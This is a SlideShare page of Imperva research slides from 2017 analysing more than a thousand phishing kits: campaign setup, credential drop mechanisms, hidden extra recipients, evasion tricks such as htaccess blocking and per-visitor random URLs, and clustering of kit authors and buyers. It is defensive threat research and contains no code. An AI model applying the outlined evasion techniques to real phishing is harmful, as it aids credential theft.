SlideShare uma empresa Scribd logo

Research: From zero to phishing in 60 seconds

Imperva
Imperva

Here are the highlights of our research on do-it-yourself kits for phishing attacks, allowing attackers to quickly and elegantly mount a phishing campaign. These slides present examples of phishing kits, reviews their main capabilities, and shows a statistical and clustering analysis of our collection of phishing kits. The main goal of our research is to shed light on the dynamics of phishing and the distribution of phishing kits in the underground community

Tecnologia
1 de 26
© 2017 Imperva, Inc. All rights reserved. From Zero to Phishing in 60 Seconds Luda Lazar, Imperva Research Team June 2017
© 2017 Imperva, Inc. All rights reserved. Introduction 1 2
© 2017 Imperva, Inc. All rights reserved. Introduction & Goals • How to setup a phishing campaign in 60 seconds? • Phishing kits examples and their main capabilities • Statistical analysis • Clustering analysis 3
© 2017 Imperva, Inc. All rights reserved. How to Setup a Phishing Campaign in 60 Seconds? 4 Spam Service / [SMTP] Server Email List Compromised Server or Hosting ServicesPhishing Pages
© 2017 Imperva, Inc. All rights reserved. Phishing Attack 5 2. Send phishing email Phishing Site Attacker Victim 3. Visit phishing page 4. Send stolen credentials Email Account 5. Harvest new credentials
© 2017 Imperva, Inc. All rights reserved. The Research from 20,000 feet 6 Conclusions Analyzing phishing kits Extracting features Obtaining phishing kits Phishing sites sources
© 2017 Imperva, Inc. All rights reserved. Numbers • OpenPhish feed: – Total amount of phishing URLs: 8388 (after noise cleanup) – Total number of phishing kits: 591  7% • TechHelpList.com pastes (All URLs of last year): – Total amount of phishing URLs: 4463 – Total number of phishing kits: 428 DIY kits  9.6% • Total 1019 kits 7
© 2017 Imperva, Inc. All rights reserved. Phishing Kits Examples 2 8
© 2017 Imperva, Inc. All rights reserved. Phishing Kit Structure • Phishing kits contain two types of files: – Files needed to display a copy of the targeted web site (resources files) – Scripts used to save the phished information and send it to phishers 9
© 2017 Imperva, Inc. All rights reserved. Google Docs Phishing Kit 10
© 2017 Imperva, Inc. All rights reserved. Phishing Processing Code 11
© 2017 Imperva, Inc. All rights reserved. Phishing Kit Capabilities 3 12
© 2017 Imperva, Inc. All rights reserved. Drop Mechanisms of Phishing Kits • 98% of kits use email to send data to the attackers • 2% of kits save collected data on the server in log file (in a one kit the result stored in DB) 13 Remote, 98% Local, 2%
© 2017 Imperva, Inc. All rights reserved. Implicit Recipients • About 25% of DIY kits contains hidden drops, secretly sending emails with the phished information to addresses different than the intended ones – Address Obfuscation – Repeated mail statements 14
© 2017 Imperva, Inc. All rights reserved. Extending the Lifespan - Block Unwanted Access • 17% of DIY kits contain techniques to block unwanted access to them • Focused on avoiding detection by security companies and index services – htaccess – robots.txt – PHP scripts 15
© 2017 Imperva, Inc. All rights reserved. Extending the Lifespan - Blacklist Evasion • Randomize URL per visitor – Creates a random phishing kit subdirectory – Copies the content of the entire kit inside it – Redirects the visitor to the newly generated random location 16
© 2017 Imperva, Inc. All rights reserved. Clustering Analysis 4 17
© 2017 Imperva, Inc. All rights reserved. Research Method • Features characterize phishing kit • Statistical analysis • Clustering: – Files list (metadata of DIY archive) – Author’s signature (results processing file) – Subject (results email) – Sender (results email ‘from’ header) • Every cluster of kits has at least one of the features in common Confidential18
© 2017 Imperva, Inc. All rights reserved. Clustering Results • Total number of clusters: 230 – 19 clusters (size of each cluster => 10), covering 541 kits (53% of data) – 48 clusters (size of each cluster => 5), covering 731 kits (72% of data) – 118 clusters (size of each cluster => 2), covering 907 kits (89% of data) • Similarity statistics: – 14% of the kits have four identical features – 39% of the kits have at least three identical features – 56% of the kits have at least two identical features 19
© 2017 Imperva, Inc. All rights reserved. Phishing Kits Graph 20
© 2017 Imperva, Inc. All rights reserved. Author Signature Total number of authors signatures: 271 • 32% of kits didn’t contain author’s signature • 17% of kits signed with a unique signature • 51% of kits signed with a not unique signature 21
© 2017 Imperva, Inc. All rights reserved. Fud Tool Dot Com 22
© 2017 Imperva, Inc. All rights reserved. Kits’ Buyers (Results Email Recipients) • Total number of buyers: 715 (distinct addresses) • 8% of buyers appear in at least three different kits (represent 23% of kits) • 24% of buyers appear in at least two different kits (represent 46% of kits) 23
© 2017 Imperva, Inc. All rights reserved. Conclusions • Phishing is here to stay – It is still a significant and effective cyber threat – Phishing DIY kits are significant facilitator for this, lowering the cost and time it takes to mount a phishing campaign • Phishing ecosystem resembles legitimate economic ecosystems: – Role-based ecosystem with technology vendors and service providers – Phishers phish phishers: some players misbehave…. 24
© 2017 Imperva, Inc. All rights reserved. More Info • Click here to subscribe to the Imperva blog for more details on phishing, as well as other application and data security trends: https://www.imperva.com/blog/ Confidential25
Research: From zero to phishing in 60 seconds

Recomendados

Beyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountBeyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountImperva
 
Rise of Ransomware
Rise of Ransomware Rise of Ransomware
Rise of Ransomware Imperva
 
Anatomy of the Compromised Insider
Anatomy of the Compromised InsiderAnatomy of the Compromised Insider
Anatomy of the Compromised InsiderImperva
 
The State of Ransomware 2020
The State of Ransomware 2020The State of Ransomware 2020
The State of Ransomware 2020Netpluz Asia Pte Ltd
 
Webinar: A deep dive on ransomware
Webinar: A deep dive on ransomwareWebinar: A deep dive on ransomware
Webinar: A deep dive on ransomwareCyren, Inc
 
Netpluz | Protecting your Business with eSentinel | 360° Cyber Security Simpl...
Netpluz | Protecting your Business with eSentinel | 360° Cyber Security Simpl...Netpluz | Protecting your Business with eSentinel | 360° Cyber Security Simpl...
Netpluz | Protecting your Business with eSentinel | 360° Cyber Security Simpl...Netpluz Asia Pte Ltd
 
PIE - BSides Vancouver 2018
PIE - BSides Vancouver 2018PIE - BSides Vancouver 2018
PIE - BSides Vancouver 2018Greg Foss
 
The Anatomy of Comment Spam
The Anatomy of Comment SpamThe Anatomy of Comment Spam
The Anatomy of Comment SpamImperva
 

Recomendados

Beyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountBeyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountImperva
 
Rise of Ransomware
Rise of Ransomware Rise of Ransomware
Rise of Ransomware Imperva
 
Anatomy of the Compromised Insider
Anatomy of the Compromised InsiderAnatomy of the Compromised Insider
Anatomy of the Compromised InsiderImperva
 
The State of Ransomware 2020
The State of Ransomware 2020The State of Ransomware 2020
The State of Ransomware 2020Netpluz Asia Pte Ltd
 
Webinar: A deep dive on ransomware
Webinar: A deep dive on ransomwareWebinar: A deep dive on ransomware
Webinar: A deep dive on ransomwareCyren, Inc
 
Netpluz | Protecting your Business with eSentinel | 360° Cyber Security Simpl...
Netpluz | Protecting your Business with eSentinel | 360° Cyber Security Simpl...Netpluz | Protecting your Business with eSentinel | 360° Cyber Security Simpl...
Netpluz | Protecting your Business with eSentinel | 360° Cyber Security Simpl...Netpluz Asia Pte Ltd
 
PIE - BSides Vancouver 2018
PIE - BSides Vancouver 2018PIE - BSides Vancouver 2018
PIE - BSides Vancouver 2018Greg Foss
 
The Anatomy of Comment Spam
The Anatomy of Comment SpamThe Anatomy of Comment Spam
The Anatomy of Comment SpamImperva
 
Mastering Next Gen SIEM Use Cases (Part 3)
Mastering Next Gen SIEM Use Cases (Part 3)Mastering Next Gen SIEM Use Cases (Part 3)
Mastering Next Gen SIEM Use Cases (Part 3)DNIF
 
How to Take the Ransom Out of Ransomware
How to Take the Ransom Out of RansomwareHow to Take the Ransom Out of Ransomware
How to Take the Ransom Out of Ransomwaremarketingunitrends
 
Triangulum - Ransomware Evolved - Why your backups arent good enough
Triangulum - Ransomware Evolved - Why your backups arent good enoughTriangulum - Ransomware Evolved - Why your backups arent good enough
Triangulum - Ransomware Evolved - Why your backups arent good enoughMartin Opsahl
 
Phishing Intelligence Engine - BlueHat v17
Phishing Intelligence Engine - BlueHat v17Phishing Intelligence Engine - BlueHat v17
Phishing Intelligence Engine - BlueHat v17Greg Foss
 
Anatomy of a Ransomware Event
Anatomy of a Ransomware EventAnatomy of a Ransomware Event
Anatomy of a Ransomware EventArt Ocain
 
Lifecycle: Responding to a Ransomware Attack - A Professional Breach Guide's ...
Lifecycle: Responding to a Ransomware Attack - A Professional Breach Guide's ...Lifecycle: Responding to a Ransomware Attack - A Professional Breach Guide's ...
Lifecycle: Responding to a Ransomware Attack - A Professional Breach Guide's ...Shawn Tuma
 
Managing security risks in today's digital era
Managing security risks in today's digital eraManaging security risks in today's digital era
Managing security risks in today's digital eraSingtel
 
Exhibitor session: Fortinet
Exhibitor session: FortinetExhibitor session: Fortinet
Exhibitor session: FortinetJisc
 
Become a Threat Hunter by Hamza Beghal
Become a Threat Hunter by Hamza BeghalBecome a Threat Hunter by Hamza Beghal
Become a Threat Hunter by Hamza BeghalNull Singapore
 
Netwatcher Credit Union Tech Talk
Netwatcher Credit Union Tech TalkNetwatcher Credit Union Tech Talk
Netwatcher Credit Union Tech TalkNetWatcher
 
Cyber Attack Survival: Are You Ready?
Cyber Attack Survival: Are You Ready?Cyber Attack Survival: Are You Ready?
Cyber Attack Survival: Are You Ready?Radware
 
The Best Just Got Better, Intercept X Now With EDR
The Best Just Got Better, Intercept X Now With EDRThe Best Just Got Better, Intercept X Now With EDR
The Best Just Got Better, Intercept X Now With EDRNetpluz Asia Pte Ltd
 
Jisc cyber security posture survey
Jisc cyber security posture surveyJisc cyber security posture survey
Jisc cyber security posture surveyJisc
 
The Ugly Cost of Cyber Crime
The Ugly Cost of Cyber CrimeThe Ugly Cost of Cyber Crime
The Ugly Cost of Cyber CrimeRahul Neel Mani
 
CeBIT 2015 Presentation
CeBIT 2015 PresentationCeBIT 2015 Presentation
CeBIT 2015 PresentationCyren, Inc
 
Building the Security Operations and SIEM Use CAse
Building the Security Operations and SIEM Use CAseBuilding the Security Operations and SIEM Use CAse
Building the Security Operations and SIEM Use CAseDon Murdoch GSE CyberGuardian CISSP
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec
 
The Internal Signs of Compromise
The Internal Signs of CompromiseThe Internal Signs of Compromise
The Internal Signs of CompromiseFireEye, Inc.
 
What Happens Before the Kill Chain
What Happens Before the Kill Chain What Happens Before the Kill Chain
What Happens Before the Kill Chain OpenDNS
 
Lessons Learned from Building and Running MHN, the World's Largest Crowdsourc...
Lessons Learned from Building and Running MHN, the World's Largest Crowdsourc...Lessons Learned from Building and Running MHN, the World's Largest Crowdsourc...
Lessons Learned from Building and Running MHN, the World's Largest Crowdsourc...Jason Trost
 
D3LDN17 - A Pragmatists Guide to DDoS Mitigation
D3LDN17 - A Pragmatists Guide to DDoS MitigationD3LDN17 - A Pragmatists Guide to DDoS Mitigation
D3LDN17 - A Pragmatists Guide to DDoS MitigationImperva Incapsula
 
2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the HumanPhishLabs
 

Mais conteúdo relacionado

Mais procurados

Mastering Next Gen SIEM Use Cases (Part 3)
Mastering Next Gen SIEM Use Cases (Part 3)Mastering Next Gen SIEM Use Cases (Part 3)
Mastering Next Gen SIEM Use Cases (Part 3)DNIF
 
How to Take the Ransom Out of Ransomware
How to Take the Ransom Out of RansomwareHow to Take the Ransom Out of Ransomware
How to Take the Ransom Out of Ransomwaremarketingunitrends
 
Triangulum - Ransomware Evolved - Why your backups arent good enough
Triangulum - Ransomware Evolved - Why your backups arent good enoughTriangulum - Ransomware Evolved - Why your backups arent good enough
Triangulum - Ransomware Evolved - Why your backups arent good enoughMartin Opsahl
 
Phishing Intelligence Engine - BlueHat v17
Phishing Intelligence Engine - BlueHat v17Phishing Intelligence Engine - BlueHat v17
Phishing Intelligence Engine - BlueHat v17Greg Foss
 
Anatomy of a Ransomware Event
Anatomy of a Ransomware EventAnatomy of a Ransomware Event
Anatomy of a Ransomware EventArt Ocain
 
Lifecycle: Responding to a Ransomware Attack - A Professional Breach Guide's ...
Lifecycle: Responding to a Ransomware Attack - A Professional Breach Guide's ...Lifecycle: Responding to a Ransomware Attack - A Professional Breach Guide's ...
Lifecycle: Responding to a Ransomware Attack - A Professional Breach Guide's ...Shawn Tuma
 
Managing security risks in today's digital era
Managing security risks in today's digital eraManaging security risks in today's digital era
Managing security risks in today's digital eraSingtel
 
Exhibitor session: Fortinet
Exhibitor session: FortinetExhibitor session: Fortinet
Exhibitor session: FortinetJisc
 
Become a Threat Hunter by Hamza Beghal
Become a Threat Hunter by Hamza BeghalBecome a Threat Hunter by Hamza Beghal
Become a Threat Hunter by Hamza BeghalNull Singapore
 
Netwatcher Credit Union Tech Talk
Netwatcher Credit Union Tech TalkNetwatcher Credit Union Tech Talk
Netwatcher Credit Union Tech TalkNetWatcher
 
Cyber Attack Survival: Are You Ready?
Cyber Attack Survival: Are You Ready?Cyber Attack Survival: Are You Ready?
Cyber Attack Survival: Are You Ready?Radware
 
The Best Just Got Better, Intercept X Now With EDR
The Best Just Got Better, Intercept X Now With EDRThe Best Just Got Better, Intercept X Now With EDR
The Best Just Got Better, Intercept X Now With EDRNetpluz Asia Pte Ltd
 
Jisc cyber security posture survey
Jisc cyber security posture surveyJisc cyber security posture survey
Jisc cyber security posture surveyJisc
 
The Ugly Cost of Cyber Crime
The Ugly Cost of Cyber CrimeThe Ugly Cost of Cyber Crime
The Ugly Cost of Cyber CrimeRahul Neel Mani
 
CeBIT 2015 Presentation
CeBIT 2015 PresentationCeBIT 2015 Presentation
CeBIT 2015 PresentationCyren, Inc
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec
 
The Internal Signs of Compromise
The Internal Signs of CompromiseThe Internal Signs of Compromise
The Internal Signs of CompromiseFireEye, Inc.
 
What Happens Before the Kill Chain
What Happens Before the Kill Chain What Happens Before the Kill Chain
What Happens Before the Kill Chain OpenDNS
 
Lessons Learned from Building and Running MHN, the World's Largest Crowdsourc...
Lessons Learned from Building and Running MHN, the World's Largest Crowdsourc...Lessons Learned from Building and Running MHN, the World's Largest Crowdsourc...
Lessons Learned from Building and Running MHN, the World's Largest Crowdsourc...Jason Trost
 

Mais procurados (20)

Mastering Next Gen SIEM Use Cases (Part 3)
Mastering Next Gen SIEM Use Cases (Part 3)Mastering Next Gen SIEM Use Cases (Part 3)
Mastering Next Gen SIEM Use Cases (Part 3)
 
How to Take the Ransom Out of Ransomware
How to Take the Ransom Out of RansomwareHow to Take the Ransom Out of Ransomware
How to Take the Ransom Out of Ransomware
 
Triangulum - Ransomware Evolved - Why your backups arent good enough
Triangulum - Ransomware Evolved - Why your backups arent good enoughTriangulum - Ransomware Evolved - Why your backups arent good enough
Triangulum - Ransomware Evolved - Why your backups arent good enough
 
Phishing Intelligence Engine - BlueHat v17
Phishing Intelligence Engine - BlueHat v17Phishing Intelligence Engine - BlueHat v17
Phishing Intelligence Engine - BlueHat v17
 
Anatomy of a Ransomware Event
Anatomy of a Ransomware EventAnatomy of a Ransomware Event
Anatomy of a Ransomware Event
 
Lifecycle: Responding to a Ransomware Attack - A Professional Breach Guide's ...
Lifecycle: Responding to a Ransomware Attack - A Professional Breach Guide's ...Lifecycle: Responding to a Ransomware Attack - A Professional Breach Guide's ...
Lifecycle: Responding to a Ransomware Attack - A Professional Breach Guide's ...
 
Managing security risks in today's digital era
Managing security risks in today's digital eraManaging security risks in today's digital era
Managing security risks in today's digital era
 
Exhibitor session: Fortinet
Exhibitor session: FortinetExhibitor session: Fortinet
Exhibitor session: Fortinet
 
Become a Threat Hunter by Hamza Beghal
Become a Threat Hunter by Hamza BeghalBecome a Threat Hunter by Hamza Beghal
Become a Threat Hunter by Hamza Beghal
 
Netwatcher Credit Union Tech Talk
Netwatcher Credit Union Tech TalkNetwatcher Credit Union Tech Talk
Netwatcher Credit Union Tech Talk
 
Cyber Attack Survival: Are You Ready?
Cyber Attack Survival: Are You Ready?Cyber Attack Survival: Are You Ready?
Cyber Attack Survival: Are You Ready?
 
The Best Just Got Better, Intercept X Now With EDR
The Best Just Got Better, Intercept X Now With EDRThe Best Just Got Better, Intercept X Now With EDR
The Best Just Got Better, Intercept X Now With EDR
 
Jisc cyber security posture survey
Jisc cyber security posture surveyJisc cyber security posture survey
Jisc cyber security posture survey
 
The Ugly Cost of Cyber Crime
The Ugly Cost of Cyber CrimeThe Ugly Cost of Cyber Crime
The Ugly Cost of Cyber Crime
 
CeBIT 2015 Presentation
CeBIT 2015 PresentationCeBIT 2015 Presentation
CeBIT 2015 Presentation
 
Building the Security Operations and SIEM Use CAse
Building the Security Operations and SIEM Use CAseBuilding the Security Operations and SIEM Use CAse
Building the Security Operations and SIEM Use CAse
 
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CKSymantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
Symantec Webinar | How to Detect Targeted Ransomware with MITRE ATT&CK
 
The Internal Signs of Compromise
The Internal Signs of CompromiseThe Internal Signs of Compromise
The Internal Signs of Compromise
 
What Happens Before the Kill Chain
What Happens Before the Kill Chain What Happens Before the Kill Chain
What Happens Before the Kill Chain
 
Lessons Learned from Building and Running MHN, the World's Largest Crowdsourc...
Lessons Learned from Building and Running MHN, the World's Largest Crowdsourc...Lessons Learned from Building and Running MHN, the World's Largest Crowdsourc...
Lessons Learned from Building and Running MHN, the World's Largest Crowdsourc...
 

Semelhante a Research: From zero to phishing in 60 seconds

D3LDN17 - A Pragmatists Guide to DDoS Mitigation
D3LDN17 - A Pragmatists Guide to DDoS MitigationD3LDN17 - A Pragmatists Guide to DDoS Mitigation
D3LDN17 - A Pragmatists Guide to DDoS MitigationImperva Incapsula
 
2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the HumanPhishLabs
 
D3SF17- Using Incap Rules to Customize Your Security and Access Control
D3SF17- Using Incap Rules to Customize Your Security and Access ControlD3SF17- Using Incap Rules to Customize Your Security and Access Control
D3SF17- Using Incap Rules to Customize Your Security and Access ControlImperva Incapsula
 
The Importance of Cybersecurity in 2017
The Importance of Cybersecurity in 2017The Importance of Cybersecurity in 2017
The Importance of Cybersecurity in 2017R-Style Lab
 
PhoenixCon 2018 - Applications of HBase/Phoenix @ 23andMe
PhoenixCon 2018 - Applications of HBase/Phoenix @ 23andMePhoenixCon 2018 - Applications of HBase/Phoenix @ 23andMe
PhoenixCon 2018 - Applications of HBase/Phoenix @ 23andMeTulasi Paradarami
 
How to improve resilience and respond better to Cyber Attacks with ISO 22301?
How to improve resilience and respond better to Cyber Attacks with ISO 22301?How to improve resilience and respond better to Cyber Attacks with ISO 22301?
How to improve resilience and respond better to Cyber Attacks with ISO 22301?PECB
 
From Mirai to Monero – One Year’s Worth of Honeypot Data
From Mirai to Monero – One Year’s Worth of Honeypot DataFrom Mirai to Monero – One Year’s Worth of Honeypot Data
From Mirai to Monero – One Year’s Worth of Honeypot DataDefCamp
 
Using Splunk to Defend Against Advanced Threats - Webinar Slides: November 2017
Using Splunk to Defend Against Advanced Threats - Webinar Slides: November 2017Using Splunk to Defend Against Advanced Threats - Webinar Slides: November 2017
Using Splunk to Defend Against Advanced Threats - Webinar Slides: November 2017Splunk
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxAfsanaMumal2
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxsanap6
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxinstaeditz009
 
D3NY17- Using IncapRules to Customize Security
D3NY17- Using IncapRules to Customize SecurityD3NY17- Using IncapRules to Customize Security
D3NY17- Using IncapRules to Customize SecurityImperva Incapsula
 
Digital Velocity London 2017: Understanding AudienceStream Timeline and Funne...
Digital Velocity London 2017: Understanding AudienceStream Timeline and Funne...Digital Velocity London 2017: Understanding AudienceStream Timeline and Funne...
Digital Velocity London 2017: Understanding AudienceStream Timeline and Funne...Tealium
 
Protecting What Matters Most – Data
Protecting What Matters Most – DataProtecting What Matters Most – Data
Protecting What Matters Most – DataFujitsu Middle East
 
Centrally Protect Your AWS Resources with Amazon GuardDuty - AWS Online Tech ...
Centrally Protect Your AWS Resources with Amazon GuardDuty - AWS Online Tech ...Centrally Protect Your AWS Resources with Amazon GuardDuty - AWS Online Tech ...
Centrally Protect Your AWS Resources with Amazon GuardDuty - AWS Online Tech ...Amazon Web Services
 
The Case for EDR: What's In Your Toolkit
The Case for EDR: What's In Your ToolkitThe Case for EDR: What's In Your Toolkit
The Case for EDR: What's In Your ToolkitDawn Yankeelov
 

Semelhante a Research: From zero to phishing in 60 seconds (20)

D3LDN17 - A Pragmatists Guide to DDoS Mitigation
D3LDN17 - A Pragmatists Guide to DDoS MitigationD3LDN17 - A Pragmatists Guide to DDoS Mitigation
D3LDN17 - A Pragmatists Guide to DDoS Mitigation
 
2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human2017 Phishing Trends & Intelligence Report: Hacking the Human
2017 Phishing Trends & Intelligence Report: Hacking the Human
 
D3SF17- Using Incap Rules to Customize Your Security and Access Control
D3SF17- Using Incap Rules to Customize Your Security and Access ControlD3SF17- Using Incap Rules to Customize Your Security and Access Control
D3SF17- Using Incap Rules to Customize Your Security and Access Control
 
The Importance of Cybersecurity in 2017
The Importance of Cybersecurity in 2017The Importance of Cybersecurity in 2017
The Importance of Cybersecurity in 2017
 
Speed and security for your PHP application
Speed and security for your PHP applicationSpeed and security for your PHP application
Speed and security for your PHP application
 
HACKING
HACKINGHACKING
HACKING
 
Découvrez le Rugged DevOps
Découvrez le Rugged DevOpsDécouvrez le Rugged DevOps
Découvrez le Rugged DevOps
 
PhoenixCon 2018 - Applications of HBase/Phoenix @ 23andMe
PhoenixCon 2018 - Applications of HBase/Phoenix @ 23andMePhoenixCon 2018 - Applications of HBase/Phoenix @ 23andMe
PhoenixCon 2018 - Applications of HBase/Phoenix @ 23andMe
 
How to improve resilience and respond better to Cyber Attacks with ISO 22301?
How to improve resilience and respond better to Cyber Attacks with ISO 22301?How to improve resilience and respond better to Cyber Attacks with ISO 22301?
How to improve resilience and respond better to Cyber Attacks with ISO 22301?
 
From Mirai to Monero – One Year’s Worth of Honeypot Data
From Mirai to Monero – One Year’s Worth of Honeypot DataFrom Mirai to Monero – One Year’s Worth of Honeypot Data
From Mirai to Monero – One Year’s Worth of Honeypot Data
 
Using Splunk to Defend Against Advanced Threats - Webinar Slides: November 2017
Using Splunk to Defend Against Advanced Threats - Webinar Slides: November 2017Using Splunk to Defend Against Advanced Threats - Webinar Slides: November 2017
Using Splunk to Defend Against Advanced Threats - Webinar Slides: November 2017
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptx
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptx
 
Cybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptxCybersecurity Awareness Overview.pptx
Cybersecurity Awareness Overview.pptx
 
D3NY17- Using IncapRules to Customize Security
D3NY17- Using IncapRules to Customize SecurityD3NY17- Using IncapRules to Customize Security
D3NY17- Using IncapRules to Customize Security
 
Digital Velocity London 2017: Understanding AudienceStream Timeline and Funne...
Digital Velocity London 2017: Understanding AudienceStream Timeline and Funne...Digital Velocity London 2017: Understanding AudienceStream Timeline and Funne...
Digital Velocity London 2017: Understanding AudienceStream Timeline and Funne...
 
Protecting What Matters Most – Data
Protecting What Matters Most – DataProtecting What Matters Most – Data
Protecting What Matters Most – Data
 
Centrally Protect Your AWS Resources with Amazon GuardDuty - AWS Online Tech ...
Centrally Protect Your AWS Resources with Amazon GuardDuty - AWS Online Tech ...Centrally Protect Your AWS Resources with Amazon GuardDuty - AWS Online Tech ...
Centrally Protect Your AWS Resources with Amazon GuardDuty - AWS Online Tech ...
 
The Case for EDR: What's In Your Toolkit
The Case for EDR: What's In Your ToolkitThe Case for EDR: What's In Your Toolkit
The Case for EDR: What's In Your Toolkit
 
Security/Compliance - Advanced Threat Detection and Compliance
Security/Compliance - Advanced Threat Detection and ComplianceSecurity/Compliance - Advanced Threat Detection and Compliance
Security/Compliance - Advanced Threat Detection and Compliance
 

Mais de Imperva

Cybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyCybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyImperva
 
API Security Survey
API Security SurveyAPI Security Survey
API Security SurveyImperva
 
Imperva ppt
Imperva pptImperva ppt
Imperva pptImperva
 
Making Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to NarrativesMaking Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to NarrativesImperva
 
How We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over LunchHow We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over LunchImperva
 
Survey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber SecuritySurvey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber SecurityImperva
 
Companies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPRCompanies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPRImperva
 
7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged VendorsImperva
 
SEO Botnet Sophistication
SEO Botnet SophisticationSEO Botnet Sophistication
SEO Botnet SophisticationImperva
 
Phishing Made Easy
Phishing Made EasyPhishing Made Easy
Phishing Made EasyImperva
 
Imperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense ReportImperva 2017 Cyber Threat Defense Report
Imperva 2017 Cyber Threat Defense ReportImperva
 
Combat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat IntelligenceCombat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat IntelligenceImperva
 
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing ExponentiallyHTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing ExponentiallyImperva
 
Get Going With Your GDPR Plan
Get Going With Your GDPR PlanGet Going With Your GDPR Plan
Get Going With Your GDPR PlanImperva
 
Cyber Criminal's Path To Your Data
Cyber Criminal's Path To Your DataCyber Criminal's Path To Your Data
Cyber Criminal's Path To Your DataImperva
 
Combat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data SecurityCombat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data SecurityImperva
 
Hacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation FoundationHacking HTTP/2 : New attacks on the Internet’s Next Generation Foundation
Hacking HTTP/2 : New attacks on the Internet’s Next Generation FoundationImperva
 
Gartner MQ for Web App Firewall Webinar
Gartner MQ for Web App Firewall WebinarGartner MQ for Web App Firewall Webinar
Gartner MQ for Web App Firewall WebinarImperva
 
More Databases. More Hackers. More Audits.
More Databases. More Hackers. More Audits.More Databases. More Hackers. More Audits.
More Databases. More Hackers. More Audits.Imperva
 
Protect Your Data and Apps in the Public Cloud
Protect Your Data and Apps in the Public CloudProtect Your Data and Apps in the Public Cloud
Protect Your Data and Apps in the Public CloudImperva
 

Mais de Imperva (20)

Cybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyCybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 Survey
 
API Security Survey
API Security SurveyAPI Security Survey
API Security Survey
 
Imperva ppt
Imperva pptImperva ppt
Imperva ppt
 
Making Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to NarrativesMaking Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to Narratives
 
How We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over LunchHow We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over Lunch
 
Survey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber SecuritySurvey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber Security
 
Companies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPRCompanies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPR
 
7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors7 Tips to Protect Your Data from Contractors and Privileged Vendors
7 Tips to Protect Your Data from Contractors and Privileged Vendors
 
SEO Botnet Sophistication
